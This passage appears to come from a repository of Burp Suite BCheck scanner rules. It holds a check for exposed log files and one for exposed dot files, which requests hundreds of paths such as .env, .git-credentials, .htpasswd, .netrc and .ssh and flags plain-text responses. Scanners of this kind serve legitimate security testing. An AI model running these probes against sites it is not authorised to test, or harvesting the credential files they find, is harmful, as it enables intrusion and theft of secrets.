424 |         "sbr-test2.log",
425 |         "sbr-test3.log",
426 |         "sbr-test4.log",
427 |         "script.log",
428 |         "scss-lint.log",
429 |         "search.log",
430 |         "selenium-debug.log",
431 |         "server.log",
432 |         "servers.log",
433 |         "service.log",
434 |         "setup.log",
435 |         "short.log",
436 |         "siege.log",
437 |         "simple.log",
438 |         "simtrace.log",
439 |         "simulation.log",
440 |         "sinatra.log",
441 |         "sixad.log",
442 |         "size.log",
443 |         "size1.log",
444 |         "slides.log",
445 |         "slow.log",
446 |         "small.log",
447 |         "snapdiff.log",
448 |         "snapshot.log",
449 |         "snep_p2p_trace.log",
450 |         "snoopy.log",
451 |         "soap_xml.log",
452 |         "some.log",
453 |         "spec.log",
454 |         "spring-shell.log",
455 |         "spring.log",
456 |         "sql.log",
457 |         "sqlnet.log",
458 |         "sqlsn_noop.test.log",
459 |         "sqlsn_require.test.log",
460 |         "sqlsn_require_from_path.test.log",
461 |         "sslstrip.log",
462 |         "ssm.log",
463 |         "stacktrace.log",
464 |         "stats.log",
465 |         "status.log",
466 |         "stderr.log",
467 |         "stdout.log",
468 |         "storage/logs/laravel.log",
469 |         "stream.log",
470 |         "success.log",
471 |         "supervisord.log",
472 |         "sut.log",
473 |         "sveditor.log",
474 |         "synthesis.log",
475 |         "syslog.log",
476 |         "system.log",
477 |         "t.log",
478 |         "task.log",
479 |         "tdk-bluetooth.log",
480 |         "telegram.log",
481 |         "temp.log",
482 |         "temperature.log",
483 |         "test-suite.log",
484 |         "test.log",
485 |         "test001.log",
486 |         "test1.log",
487 |         "test_01.log",
488 |         "test_1.log",
489 |         "test_avgQ.log",
490 |         "test_avgR.log",
491 |         "test_extension.log",
492 |         "test_log.log",
493 |         "testdb.log",
494 |         "testlog.log",
495 |         "testoutput_simple.3.log",
496 |         "testrun.log",
497 |         "tests-clean.log",
498 |         "tests.log",
499 |         "tex-ref.log",
500 |         "texput.log",
501 |         "thesis.log",
502 |         "thin.log",
503 |         "time.log",
504 |         "tmp.log",
505 |         "top.log",
506 |         "trace.log",
507 |         "traffic.log",
508 |         "train.log",
509 |         "transaction.log",
510 |         "travis.log",
511 |         "tree.log",
512 |         "tutorial.log",
513 |         "two.log",
514 |         "txt.log",
515 |         "uname.log",
516 |         "unicorn.stderr.log",
517 |         "unicorn.stdout.log",
518 |         "unrecognized_line.log",
519 |         "update.log",
520 |         "uptime.log",
521 |         "urlsnarf.log",
522 |         "user.log",
523 |         "users.log",
524 |         "utc.log",
525 |         "uwsgi.log",
526 |         "v8.log",
527 |         "valgrind.log",
528 |         "validation_errors.log",
529 |         "varnish.log",
530 |         "velocity.log",
531 |         "verify.log",
532 |         "version.log",
533 |         "voltage.log",
534 |         "vsftpd.log",
535 |         "warn.log",
536 |         "warning.log",
537 |         "warnings.log",
538 |         "web.log",
539 |         "webrat.log",
540 |         "webtalk.log",
541 |         "weechat.log",
542 |         "weibo.log",
543 |         "weights.log",
544 |         "wget.log",
545 |         "windows.log",
546 |         "withreq.log",
547 |         "work.log",
548 |         "workerman.log",
549 |         "working-access-200-404.log",
550 |         "wp-content/debug.log",
551 |         "x.log",
552 |         "xaw2vhdl.log",
553 |         "xcodebuild.log",
554 |         "yarn-debug.log",
555 |         "yarn-error.log",
556 |         "zookeeper.log",
557 |         "_debug.log",
558 |         "kube-proxy.log",
559 |         "etcd-events.log",
560 |         "kube-scheduler.log",
561 |         "kube-apiserver.log",
562 |         "etcd.log",
563 |         "kube-controller-manager.log",
564 |         "kube-addon-manager.log",
565 |         "kube-apiserver-audit.log",
566 |         "glbc.log",
567 |         "admin/errors.log"
568 | 
569 | given path then
570 |     # replace the potential path with the last path
571 |     send request called check:
572 |         method: "GET"
573 |         replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{sensitive_path}`
574 | 
575 |     # send a random request in the hopes of effectively filtering out false positives
576 |     send request called garbage:
577 |         replacing path: `{garbage_path}`
578 | 
579 |     if {check.response.status_code} is "200" and
580 |         ({check.response.headers} matches "text/plain" or
581 |         {check.response.headers} matches ".*octet-stream.*") then
582 |         if not({garbage.response.headers} matches "text/plain") and
583 |             not({garbage.response.headers} matches ".*octet-stream.*") then
584 |             # actually check the differs in the response
585 |             if {garbage.response.body} differs from {check.response.body} then
586 |                 # make sure some HTML is not present in the response
587 |                 if not({check.response.body} matches "(?i)(\<\!doctype|\<html|\<head|\<body)") and
588 |                     not({check.response.body} matches "(?i)(Oops!|Whoops!|AutodiscoverService|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") then
589 |                     report issue and continue:
590 |                         severity: low
591 |                         confidence: tentative
592 |                         detail: `{issueName} found at {check.request.url}. Manual investigation is advised`
593 |                         remediation: `Ensure the file {sensitive_path} are not exposed from your webroot`
594 |                 end if
595 |             end if
596 |         end if
597 |     end if
598 | 


--------------------------------------------------------------------------------
/sensitive/sensitive-dot-file-exposed.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Sensitive Dot File Exposed"
  4 |     description: "Tests for exposed dot file config in current path and at the root directory of site"
  5 |     author: "j3ssie"
  6 |     tags: "exposure", "sensitive", "config", "dot-file"
  7 | 
  8 | define:
  9 |     garbage_path = `/.hopefullyget404`
 10 |     issueName = `Sensitive Dot File`
 11 | 
 12 | run for each:
 13 |     # you could add more values to this list to make the check repeat
 14 |     sensitive_path =
 15 |         "!.gitignore",
 16 |         "!.htaccess",
 17 |         "!.htpasswd",
 18 |         ".7z",
 19 |         ".CSV",
 20 |         ".CVS",
 21 |         ".DS_Store",
 22 |         ".FBCIndex",
 23 |         ".JustCode",
 24 |         ".LICENSE.bud",
 25 |         ".LOCAL",
 26 |         ".LSOverride",
 27 |         ".Python",
 28 |         ".RData",
 29 |         ".README.md.bud",
 30 |         ".Rapp.history",
 31 |         ".Rbuildignore",
 32 |         ".Rhistory",
 33 |         ".Rprofile",
 34 |         ".SRCINFO",
 35 |         ".SyncID",
 36 |         ".SyncIgnore",
 37 |         ".Trash",
 38 |         ".Trashes",
 39 |         ".Xdefaults",
 40 |         ".Xresources",
 41 |         ".access",
 42 |         ".ackrc",
 43 |         ".actionScriptProperties",
 44 |         ".addressbook",
 45 |         ".adm",
 46 |         ".admin",
 47 |         ".agignore",
 48 |         ".aliases",
 49 |         ".all-contributorsrc",
 50 |         ".analysis_options",
 51 |         ".apdisk",
 52 |         ".appveyor.yml",
 53 |         ".arcconfig",
 54 |         ".architect",
 55 |         ".arclint",
 56 |         ".arcrc",
 57 |         ".atoum.php",
 58 |         ".autotest",
 59 |         ".babelrc",
 60 |         ".babelrc.js",
 61 |         ".badarg.log",
 62 |         ".badsegment.log",
 63 |         ".bak",
 64 |         ".bak_0.log",
 65 |         ".bash_aliases",
 66 |         ".bash_history",
 67 |         ".bash_logout",
 68 |         ".bash_profile",
 69 |         ".bash_prompt",
 70 |         ".bashrc",
 71 |         ".binstar.yml",
 72 |         ".bithoundrc",
 73 |         ".bootstraprc",
 74 |         ".bower-cache",
 75 |         ".bower-registry",
 76 |         ".bower-tmp",
 77 |         ".bowerrc",
 78 |         ".browserslistrc",
 79 |         ".buckconfig",
 80 |         ".buildignore",
 81 |         ".buildpacks",
 82 |         ".buildpath",
 83 |         ".builds",
 84 |         ".bumpversion.cfg",
 85 |         ".bundle",
 86 |         ".byebug_history",
 87 |         ".bz2",
 88 |         ".bzrignore",
 89 |         ".cache",
 90 |         ".cane",
 91 |         ".capistrano",
 92 |         ".cask",
 93 |         ".catalog",
 94 |         ".cc-ban.txt",
 95 |         ".cc-ban.txt.bak",
 96 |         ".cfg",
 97 |         ".cfignore",
 98 |         ".checkignore",
 99 |         ".checkstyle",
100 |         ".clang-format",
101 |         ".clang_complete",
102 |         ".classpath",
103 |         ".clog.toml",
104 |         ".coafile",
105 |         ".cobalt",
106 |         ".cocoadocs.yml",
107 |         ".codacy.yml",
108 |         ".codeclimate.yml",
109 |         ".codecov.yml",
110 |         ".codeintel",
111 |         ".codekit-cache",
112 |         ".codio",
113 |         ".coffee_history",
114 |         ".coffeelintignore",
115 |         ".compile",
116 |         ".components",
117 |         ".composer",
118 |         ".conf",
119 |         ".config",
120 |         ".config.php.swp",
121 |         ".configuration.php.swp",
122 |         ".contracts",
123 |         ".cookiecutterrc",
124 |         ".core",
125 |         ".coverage",
126 |         ".coveragerc",
127 |         ".coveralls.yml",
128 |         ".cpan",
129 |         ".cproject",
130 |         ".credo.exs",
131 |         ".csdp.cache",
132 |         ".cshrc",
133 |         ".csslintrc",
134 |         ".csv",
135 |         ".ctags",
136 |         ".curlrc",
137 |         ".cvs",
138 |         ".cvsignore",
139 |         ".dat",
140 |         ".dep.inc",
141 |         ".depend",
142 |         ".deployignore",
143 |         ".deployment",
144 |         ".dir-locals.el",
145 |         ".directory",
146 |         ".divzero.log",
147 |         ".dockercfg",
148 |         ".dockerignore",
149 |         ".document",
150 |         ".drone.sec",
151 |         ".drone.yml",
152 |         ".dub",
153 |         ".dump",
154 |         ".eclipse",
155 |         ".editorconfig",
156 |         ".elb",
157 |         ".elc",
158 |         ".emacs",
159 |         ".emacs.desktop",
160 |         ".emacs.desktop.lock",
161 |         ".ember-cli",
162 |         ".empty-folder",
163 |         ".env",
164 |         ".env-example",
165 |         ".env-sample",
166 |         ".env.dev",
167 |         ".env.development.sample",
168 |         ".env.dist",
169 |         ".env.docker.dev",
170 |         ".env.example",
171 |         ".env.php",
172 |         ".env.prod",
173 |         ".env.sample",
174 |         ".env.sample.php",
175 |         ".env.test",
176 |         ".env.test.sample",
177 |         ".env.travis",
178 |         ".environment",
179 |         ".envrc",
180 |         ".error_log",
181 |         ".esformatter",
182 |         ".eslintcache",
183 |         ".eslintignore",
184 |         ".eslintrc",
185 |         ".eslintrc.js",
186 |         ".eslintrc.yaml",
187 |         ".eslintrc.yml",
188 |         ".esmtprc",
189 |         ".espressostorage",
190 |         ".eunit",
191 |         ".exit.log",
192 |         ".exports",
193 |         ".externalNativeBuild",
194 |         ".extra",
195 |         ".factorypath",
196 |         ".faultread.log",
197 |         ".faultreadkernel.log",
198 |         ".fbprefs",
199 |         ".fetch",
200 |         ".fhp",
201 |         ".filemgr-tmp",
202 |         ".filetree",
203 |         ".finished-upgraders",
204 |         ".firebaserc",
205 |         ".fishsrv.pl",
206 |         ".fixtures.yml",
207 |         ".flac",
208 |         ".flake8",
209 |         ".flexLibProperties",
210 |         ".floo",
211 |         ".flooignore",
212 |         ".flowconfig",
213 |         ".foodcritic",
214 |         ".forktest.log",
215 |         ".forktree.log",
216 |         ".formatter.exs",
217 |         ".forward",
218 |         ".frlog",
219 |         ".ftp-access",
220 |         ".ftpconfig",
221 |         ".ftppass",
222 |         ".ftpquota",
223 |         ".functions",
224 |         ".gdbinit",
225 |         ".gem",
226 |         ".gemfile",
227 |         ".gemrc",
228 |         ".gems",
229 |         ".gemspec",
230 |         ".gemtest",
231 |         ".generators",
232 |         ".ghci",
233 |         ".git-credentials",
234 |         ".git_release",
235 |         ".gitattributes",
236 |         ".gitchangelog.rc",
237 |         ".gitconfig",
238 |         ".gitignore",
239 |         ".gitignore.orig",
240 |         ".gitignore.swp",
241 |         ".gitignore_global",
242 |         ".gitignore~",
243 |         ".gitk",
244 |         ".gitkeep",
245 |         ".gitlab",
246 |         ".gitlab-ci.yml",
247 |         ".gitmodules",
248 |         ".gitreview",
249 |         ".godir",
250 |         ".golangci.yml",
251 |         ".goreleaser.yml",
252 |         ".gradle",
253 |         ".gradletasknamecache",
254 |         ".grunt",
255 |         ".guile_history",
256 |         ".gvimrc",
257 |         ".gz",
258 |         ".hash",
259 |         ".hello.log",
260 |         ".hg",
261 |         ".hg_archival.txt",
262 |         ".hgignore",
263 |         ".hgignore.global",
264 |         ".hgrc",
265 |         ".hgtags",
266 |         ".hhconfig",
267 |         ".histfile",
268 |         ".history",
269 |         ".hound.yml",
270 |         ".hpc",
271 |         ".hsdoc",
272 |         ".hsenv",
273 |         ".ht_wsr.txt",
274 |         ".hta",
275 |         ".htaccess",
276 |         ".htaccess-dev",
277 |         ".htaccess-local",
278 |         ".htaccess-marco",
279 |         ".htaccess.BAK",
280 |         ".htaccess.bak",
281 |         ".htaccess.bak1",
282 |         ".htaccess.old",
283 |         ".htaccess.orig",
284 |         ".htaccess.sample",
285 |         ".htaccess.save",
286 |         ".htaccess.txt",
287 |         ".htaccessBAK",
288 |         ".htaccessOLD",
289 |         ".htaccessOLD2",
290 |         ".htaccess_extra",
291 |         ".htaccess_orig",
292 |         ".htaccess_sc",
293 |         ".htaccess~",
294 |         ".htgroup",
295 |         ".htmlhintrc",
296 |         ".htpasswd",
297 |         ".htpasswd-old",
298 |         ".htpasswd_test",
299 |         ".htpasswds",
300 |         ".httr-oauth",
301 |         ".htusers",
302 |         ".hushlogin",
303 |         ".id",
304 |         ".idea",
305 |         ".ignore",
306 |         ".indent.pro",
307 |         ".influx_history",
308 |         ".ini",
309 |         ".inputrc",
310 |         ".installed.cfg",
311 |         ".ipynb_checkpoints",
312 |         ".irbrc",
313 |         ".isort.cfg",
314 |         ".istanbul.yml",
315 |         ".java-buildpack.log",
316 |         ".java-version",
317 |         ".jazzy.yaml",
318 |         ".jekyll-metadata",
319 |         ".jenkins.sh",
320 |         ".jestrc",
321 |         ".joe_state",
322 |         ".jsbeautifyrc",
323 |         ".jscsrc",
324 |         ".jsdtscope",
325 |         ".jsfmtrc",
326 |         ".jshintignore",
327 |         ".jshintrc",
328 |         ".jslintrc",
329 |         ".keep",
330 |         ".kick",
331 |         ".kitchen.cloud.yml",
332 |         ".kitchen.docker.yml",
333 |         ".kitchen.dokken.yml",
334 |         ".kitchen.local.yml",
335 |         ".kitchen.yml",
336 |         ".komodotools",
337 |         ".ksh_history",
338 |         ".landscape.yaml",
339 |         ".landscape.yml",
340 |         ".last_cover_stats",
341 |         ".learn",
342 |         ".lein-deps-sum",
343 |         ".lein-failures",
344 |         ".lein-repl-history",
345 |         ".lesshst",
346 |         ".lgtm",
347 |         ".lia.cache",
348 |         ".lighttpd.conf",
349 |         ".listing",
350 |         ".listings",
351 |         ".loadpath",
352 |         ".local",
353 |         ".localsettings.php.swp",
354 |         ".lock",
355 |         ".lock-wscript",
356 |         ".log",
357 |         ".log.txt",
358 |         ".login",
359 |         ".login_conf",
360 |         ".luacheckrc",
361 |         ".luacov",
362 |         ".lvimrc",
363 |         ".lynx_cookies",
364 |         ".macos",
365 |         ".mail_aliases",
366 |         ".mailmap",
367 |         ".mailrc",
368 |         ".maintenance",
369 |         ".maintenance2",
370 |         ".mc",
371 |         ".memdump",
372 |         ".mergesources.yml",
373 |         ".merlin",
374 |         ".meta",
375 |         ".metadata",
376 |         ".metrics",
377 |         ".modman",
378 |         ".modules",
379 |         ".mr.developer.cfg",
380 |         ".msi",
381 |         ".msync.yml",
382 |         ".mweval_history",
383 |         ".mwsql_history",
384 |         ".mysql_history",
385 |         ".nakignore",
386 |         ".name",
387 |         ".nano_history",
388 |         ".nbgrader.log",
389 |         ".netrc",
390 |         ".netrwhist",
391 |         ".next",
392 |         ".nia.cache",
393 |         ".nlia.cache",
394 |         ".no-sublime-package",
395 |         ".node-version",
396 |         ".node_repl_history",
397 |         ".nodelete",
398 |         ".nodemonignore",
399 |         ".nodeset.yml",
400 |         ".nojekyll",
401 |         ".noserc",
402 |         ".npm",
403 |         ".npmignore",
404 |         ".npmrc",
405 |         ".nra.cache",
406 |         ".nrepl-port",
407 |         ".nsconfig",
408 |         ".ntvs_analysis.dat",
409 |         ".nvmrc",
410 |         ".nyc_output",
411 |         ".nycrc",
412 |         ".ocp-indent",
413 |         ".old",
414 |         ".oldsnippets",
415 |         ".oldstatic",
416 |         ".org-id-locations",
417 |         ".ost",
418 |         ".osx",
419 |         ".overcommit.yml",
420 |         ".packages",
421 |         ".pairs",
422 |         ".passwd",
423 |         ".path",
424 |         ".pdf",
425 |         ".pdkignore",
426 |         ".pep8",
427 |         ".perf",
428 |         ".perltidyrc",
429 |         ".pgadmin3",
430 |         ".pgdir.log",
431 |         ".pgpass",
432 |         ".pgsql_history",
433 |         ".php-ini",
434 |         ".php-version",
435 |         ".php_cs",
436 |         ".php_cs.dist",
437 |         ".php_history",
438 |         ".phpcs.xml",
439 |         ".phpintel",
440 |         ".phpstorm.meta.php",
441 |         ".phptidy-cache",
442 |         ".phpversion",
443 |         ".pkgmeta",
444 |         ".pki",
445 |         ".placeholder",
446 |         ".playground",
447 |         ".pmd",
448 |         ".pmtignore",
449 |         ".poggit.yml",
450 |         ".postcssrc.js",
451 |         ".powenv",
452 |         ".powrc",
453 |         ".pre-commit-config.yaml",
454 |         ".prettierignore",
455 |         ".prettierrc",
456 |         ".prettierrc.js",
457 |         ".priority.log",
458 |         ".procmailrc",
459 |         ".profile",
460 |         ".project",
461 |         ".project-settings.yml",
462 |         ".project.xml",
463 |         ".projectOptions",
464 |         ".projectile",
465 |         ".properties",
466 |         ".prospectus",
467 |         ".pryrc",
468 |         ".psci",
469 |         ".psci_modules",
470 |         ".psql_history",
471 |         ".psqlrc",
472 |         ".pst",
473 |         ".publishrc",
474 |         ".pullapprove.yml",
475 |         ".puppet-lint.rc",
476 |         ".pydevproject",
477 |         ".pylintrc",
478 |         ".pypirc",
479 |         ".python-eggs",
480 |         ".python-history",
481 |         ".python-version",
482 |         ".pyup.yml",
483 |         ".qmake.cache",
484 |         ".qmake.conf",
485 |         ".qmake.stash",
486 |         ".rakeTasks",
487 |         ".rar",
488 |         ".raw",
489 |         ".rbenv-gemsets",
490 |         ".rbenv-version",
491 |         ".rbtp",
492 |         ".rdsTempFiles",
493 |         ".readthedocs.yml",
494 |         ".rebar",
495 |         ".rediscli_history",
496 |         ".reduxrc",
497 |         ".reek",
498 |         ".remarkrc",
499 |         ".repl_history",
500 |         ".reviewboardrc",
501 |         ".revision",
502 |         ".rhosts",
503 |         ".robots.txt",
504 |         ".ropeproject",
505 |         ".rspec",
506 |         ".rspec_parallel",
507 |         ".rsync-filter",
508 |         ".rsync_cache",
509 |         ".rubocop.yml",
510 |         ".rubocop_todo.yml",
511 |         ".ruby-gemset",
512 |         ".ruby-version",
513 |         ".rultor.yml",
514 |         ".rvmrc",
515 |         ".s3backupstatus",
516 |         ".s3cfg",
517 |         ".sailsrc",
518 |         ".sass-lint.yml",
519 |         ".scala_history",
520 |         ".scalafmt.conf",
521 |         ".sconsign.dblite",
522 |         ".scrapy",
523 |         ".screenrc",
524 |         ".scrutinizer.yml",
525 |         ".scss-lint.yml",
526 |         ".selected_editor",
527 |         ".semver",
528 |         ".sensiolabs.yml",
529 |         ".sequelizerc",
530 |         ".settings",
531 |         ".settings.php.swp",
532 |         ".sh",
533 |         ".sh_history",
534 |         ".shrc",
535 |         ".simplecov",
536 |         ".slather.yml",
537 |         ".sln",
538 |         ".slugignore",
539 |         ".smalltalk.ston",
540 |         ".smushit-status",
541 |         ".snyk",
542 |         ".softint.log",
543 |         ".spacemacs",
544 |         ".spamassassin",
545 |         ".spin.log",
546 |         ".springBeans",
547 |         ".spyderproject",
548 |         ".spyproject",
549 |         ".sql",
550 |         ".sql.bz2",
551 |         ".sql.gz",
552 |         ".sqlite_history",
553 |         ".ssh",
554 |         ".ssh.asp",
555 |         ".ssh.php",
556 |         ".stestr.conf",
557 |         ".stickler.yml",
558 |         ".style.yapf",
559 |         ".styleci.yml",
560 |         ".stylelintignore",
561 |         ".stylelintrc",
562 |         ".stylintrc",
563 |         ".stylish-haskell.yaml",
564 |         ".sublime-gulp.cache",
565 |         ".sublime-project",
566 |         ".sublime-workspace",
567 |         ".sublimelinterrc",
568 |         ".subversion",
569 |         ".sunw",
570 |         ".suo",
571 |         ".svn",
572 |         ".svnignore",
573 |         ".sw",
574 |         ".swf",
575 |         ".swift-version",
576 |         ".swiftlint.yml",
577 |         ".swo",
578 |         ".swp",
579 |         ".sync.yml",
580 |         ".synthquota",
581 |         ".tachikoma.yml",
582 |         ".tags",
583 |         ".tar",
584 |         ".tar.bz2",
585 |         ".tar.gz",
586 |         ".temp",
587 |         ".template-lintrc.js",
588 |         ".tern-project",
589 |         ".testbss.log",
590 |         ".testr.conf",
591 |         ".texpadtmp",
592 |         ".tfignore",
593 |         ".tgitconfig",
594 |         ".thumbs",
595 |         ".tm_properties",
596 |         ".tmp",
597 |         ".tmproj",
598 |         ".tmux.conf",
599 |         ".tool-versions",
600 |         ".tox",
601 |         ".transients_purge.log",
602 |         ".travis.sh",
603 |         ".travis.yml",
604 |         ".user.ini",
605 |         ".vacation.cache",
606 |         ".vagrant",
607 |         ".venv",
608 |         ".verb.md",
609 |         ".verbrc.md",
610 |         ".version",
611 |         ".versions",
612 |         ".vim.custom",
613 |         ".viminfo",
614 |         ".vimrc",
615 |         ".vscodeignore",
616 |         ".waitkill.log",
617 |         ".watchmanconfig",
618 |         ".watchr",
619 |         ".web",
620 |         ".web-server-pid",
621 |         ".webassets-cache",
622 |         ".wgetrc",
623 |         ".whitesource",
624 |         ".wp-config.php.swp",
625 |         ".www_acl",
626 |         ".wwwacl",
627 |         ".xctool-args",
628 |         ".xinitrc",
629 |         ".yamllint",
630 |         ".yardopts",
631 |         ".yarnclean",
632 |         ".yarnrc",
633 |         ".ycm_extra_conf.py",
634 |         ".yield.log",
635 |         ".zeus.sock",
636 |         ".zip",
637 |         ".zprofile",
638 |         ".zsh_history",
639 |         ".zshenv",
640 |         ".zshrc",
641 |         ".zuul.yaml",
642 |         ".zuul.yml"
643 | 
644 | given path then
645 |     # replace the potential path with the last path
646 |     send request called check:
647 |         method: "GET"
648 |         replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{sensitive_path}`
649 | 
650 |     # send a random request in the hopes of effectively filtering out false positives
651 |     send request called garbage:
652 |         replacing path: `{garbage_path}`
653 | 
654 |     if {check.response.status_code} is "200" and
655 |         ({check.response.headers} matches "text/plain" or
656 |         {check.response.headers} matches ".*octet-stream.*") then
657 |         if not({garbage.response.headers} matches "text/plain") and
658 |             not({garbage.response.headers} matches ".*octet-stream.*") then
659 |             # actually check the differs in the response
660 |             if {garbage.response.body} differs from {check.response.body} then
661 |                 # make sure some HTML is not present in the response
662 |                 if not({check.response.body} matches "(?i)(\<\!doctype|\<html|\<head|\<body)") and
663 |                     not({check.response.body} matches "(?i)(Oops!|Whoops!|AutodiscoverService|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") then
664 |                     report issue and continue:
665 |                         severity: low
666 |                         confidence: tentative
667 |                         detail: `{issueName} found at {check.request.url}. Manual investigation is advised`
668 |                         remediation: `Ensure the file {sensitive_path} are not exposed from your webroot`
669 |                 end if
670 |             end if
671 |         end if
672 |     end if
673 | 


--------------------------------------------------------------------------------